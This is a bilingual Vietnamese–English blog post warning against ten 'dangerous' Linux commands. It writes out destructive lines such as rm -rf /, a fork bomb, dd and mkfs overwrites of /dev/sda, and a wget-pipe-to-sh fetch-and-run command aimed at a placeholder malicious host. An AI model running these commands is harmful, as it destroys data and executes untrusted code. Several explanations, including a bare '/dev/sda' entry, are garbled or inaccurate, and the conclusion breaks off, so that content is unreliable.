Bí mật Linux: 10 Lệnh Nguy Hiểm Bạn Không Nên Dùng

Tiếng Việt

Linux là một hệ điều hành mã nguồn mở mạnh mẽ và linh hoạt, nhưng nó cũng có thể nguy hiểm nếu sử dụng không đúng cách. Dưới đây là danh sách 10 lệnh Linux nguy hiểm mà bạn không nên sử dụng, trừ khi bạn biết chính xác những gì bạn đang làm.

rm -rf /

Lệnh này sẽ xóa tất cả các tệp và thư mục trong thư mục gốc, bao gồm cả hệ điều hành của bạn.

:(){:|:&};:

Lệnh này còn được gọi là fork bomb, nó sẽ tạo ra một vòng lặp vô hạn khiến hệ thống của bạn bị treo hoặc thậm chí là sập.

/dev/sda

Lệnh này sẽ ghi đè tất cả dữ liệu trên ổ cứng của bạn.

mv folder /dev/null

Lệnh này sẽ di chuyển tất cả các tệp trong thư mục được chỉ định vào /dev/null, một tệp đặc biệt sẽ xóa tất cả dữ liệu được ghi vào đó.

wget http://malicious_source -O- | sh

Lệnh này sẽ tải xuống và thực thi một tập lệnh từ một nguồn không đáng tin cậy.

su root

Lệnh này sẽ chuyển đổi bạn thành người dùng root, người có quyền truy cập đầy đủ vào hệ thống của bạn.

passwd root

Lệnh này sẽ đặt lại mật khẩu của người dùng root.

umount -l /mnt

Lệnh này sẽ ngắt kết nối một hệ thống tệp được gắn kết, điều này có thể khiến hệ thống của bạn bị hỏng.

mkfs.ext4 /dev/sda

Lệnh này sẽ định dạng lại ổ cứng, điều này sẽ xóa tất cả dữ liệu trên đó.

dd if=/dev/zero of=/dev/sda

Lệnh này sẽ ghi đè tất cả dữ liệu trên ổ cứng bằng các ký tự 0.

English

Linux is a powerful and flexible operating system, but it can also be dangerous if used incorrectly. Here is a list of 10 dangerous Linux commands that you should never use, unless you know exactly what you are doing.

rm -rf /

This command will delete all files and directories in the root directory, including your operating system.

:(){:|:&};:

This command, also known as a fork bomb, will create an infinite loop that will cause your system to hang or even crash.

/dev/sda

This command will overwrite all data on your hard drive.

mv folder /dev/null

This command will move all files in the specified directory to /dev/null, a special file that will delete all data written to it.

wget http://malicious_source -O- | sh

This command will download and execute a script from an untrusted source.

su root

This command will switch you to the root user, who has full access to your system.

passwd root

This command will reset the password of the root user.

umount -l /mnt

This command will unmount a mounted filesystem, which could damage your system.

mkfs.ext4 /dev/sda

This command will format a hard drive, which will erase all data on it.

dd if=/dev/zero of=/dev/sda

This command will overwrite all data on a hard drive with 0 characters.

Cách tránh các lệnh nguy hiểm

Để tránh sử dụng các lệnh nguy hiểm, bạn nên:

Chỉ sử dụng các lệnh mà bạn biết và hiểu cách sử dụng.

Đọc kỹ đầu ra của các lệnh trước khi thực thi chúng.

Sử dụng các lệnh thay thế an toàn hơn nếu có.

Kết luận

Linux là một hệ điều hành mạnh mẽ và linh hoạt, nhưng nó cũng có thể nguy hiểm nếu sử dụng không đúng cách. Bằng cách hiểu các lệnh nguy hiểm và cách tránh sử dụng chúng, bạn có thể bảo vệ hệ thống của mình khỏi bị

Bí mật Linux: 10 Lệnh Nguy Hiểm Bạn Không Nên Dùng

Leave a Reply

All in one